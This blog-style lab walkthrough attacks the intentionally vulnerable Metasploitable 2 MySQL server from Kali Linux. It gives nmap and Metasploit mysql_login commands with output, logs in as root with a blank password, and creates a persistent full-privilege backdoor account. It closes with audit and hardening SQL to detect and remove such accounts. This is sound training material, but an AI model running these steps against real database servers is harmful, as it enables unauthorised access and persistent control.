Sunday, 7 June 2015

Metasploitable2 : Hack MySQL Server using Metasploit in Kali Linux

The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. This virtual machine is compatible with VMware, VirtualBox, and other common virtualization platforms.

We have installed 'Metasploitable 2' and Kali Linux as virtual machines in KVM on CentOS 7. For instructions on how to install the Metasploitable 2 virtual machine in KVM, refer to this post.

In a previous post, we carried out a vulnerability scan of the 'Metasploitable 2' virtual machine using OpenVAS in Kali Linux.

In this post, we will hack MySQL Server using Metasploit in Kali Linux.

We have the following scenario:

Metasploitable2 IP Address: 192.168.122.74
Kali Linux IP Address:      192.168.122.115

Perform the following steps on the Kali Linux machine:

1) We perform a port scan on the Metasploitable machine and see that the MySQL port (3306/tcp) is open.
root@kali:~# nmap -p 3306 192.168.122.74

Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-07 11:09 IST
Nmap scan report for 192.168.122.74
Host is up (0.00062s latency).
PORT     STATE SERVICE
3306/tcp open  mysql
MAC Address: 00:0C:29:FA:DD:2A (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds



2) We will try to hack the password for the 'root' user, starting with a blank password to see whether it works.
 
root@kali:~# msfconsole

msf > search mysql

msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > show options
Module options (auxiliary/scanner/mysql/mysql_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             3306             yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(mysql_login) > set RHOSTS 192.168.122.74
RHOSTS => 192.168.122.74
msf auxiliary(mysql_login) > set USERNAME root
USERNAME => root
msf auxiliary(mysql_login) > set BLANK_PASSWORDS true
BLANK_PASSWORDS => true
msf auxiliary(mysql_login) > exploit

[*] 192.168.122.74:3306 MYSQL - Found remote MySQL version 5.0.51a
[!] No active DB -- Credential data will not be saved!
[!] No active DB -- Credential data will not be saved!
[+] 192.168.122.74:3306 MYSQL - Success: 'root:'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mysql_login) > quit
root@kali:~#


3) We are lucky. Now we log in to the MySQL server as user 'root' with a blank password.

root@kali:~# mysql -u root -h 192.168.122.74


4) We create a user 'shabbir' with password 'shabbir', granted full administrative privileges on the MySQL server (the *.* in the GRANT statement covers every database).

mysql> grant all on *.* to shabbir@192.168.122.115 identified by 'shabbir';
Query OK, 0 rows affected (0.00 sec)

mysql> quit
Bye


5) We can now log in to the MySQL server whenever we want with username 'shabbir' and password 'shabbir' and have full administrative access.

root@kali:~# mysql -u shabbir -h 192.168.122.74 -p
Enter password:

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| dvwa               |
| metasploit         |
| mysql              |
| owasp10            |
| tikiwiki           |
| tikiwiki195        |
+--------------------+
7 rows in set (0.00 sec)
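The steps above leave two things behind on the server that an administrator can look for: a privileged account that accepts a blank password (step 2) and a new account with global privileges reachable from a remote host (step 4). The following audit and clean-up queries are an added example, not part of the original post; they assume a MySQL 5.0/5.1-era server such as Metasploitable 2, where mysql.user still carries a 'Password' column (on 5.7 and later the column is 'authentication_string' and the SET PASSWORD syntax has changed). The 'root'@'%' host value and the CHANGE_ME password are assumptions; take the real host values from the first query's output.

```sql
-- Added audit/hardening example (not from the original post).
-- Assumes MySQL 5.0/5.1 (Metasploitable 2); adjust column names on newer servers.

-- 1) Accounts that accept a blank password (what mysql_login found for 'root').
SELECT User, Host
FROM mysql.user
WHERE Password = '';

-- 2) Accounts allowed to connect from somewhere other than the local machine.
--    A Host of '%' or one containing a wildcard means any matching remote IP may log in.
SELECT User, Host
FROM mysql.user
WHERE Host NOT IN ('localhost', '127.0.0.1');

-- 3) Accounts holding server-wide dangerous privileges (SUPER, GRANT OPTION, FILE),
--    which is what "grant all on *.*" hands out.
SELECT User, Host, Super_priv, Grant_priv, File_priv
FROM mysql.user
WHERE Super_priv = 'Y' OR Grant_priv = 'Y' OR File_priv = 'Y';

-- Show exactly what the account created in step 4 can do.
SHOW GRANTS FOR 'shabbir'@'192.168.122.115';

-- Remediation: remove the added account and give root a real password.
DROP USER 'shabbir'@'192.168.122.115';

-- 'root'@'%' is an assumed host entry; repeat for every root row query 1 returned.
-- CHANGE_ME is a placeholder for a strong password.
SET PASSWORD FOR 'root'@'%' = PASSWORD('CHANGE_ME');
SET PASSWORD FOR 'root'@'localhost' = PASSWORD('CHANGE_ME');

-- Anonymous accounts (empty User) also show up in query 1; they should not exist.
DELETE FROM mysql.user WHERE User = '';

-- Direct edits to the grant tables take effect only after a reload.
FLUSH PRIVILEGES;
```

The three SELECT statements are the check to run periodically, since a fresh row with a blank password or a remote-capable host is a strong sign of the kind of change made in step 4. The nmap result in step 1 points at the other fix: if the server has no legitimate remote clients, set bind-address = 127.0.0.1 in my.cnf so port 3306 is not reachable from the network at all, which removes the attack surface before any password guessing can start.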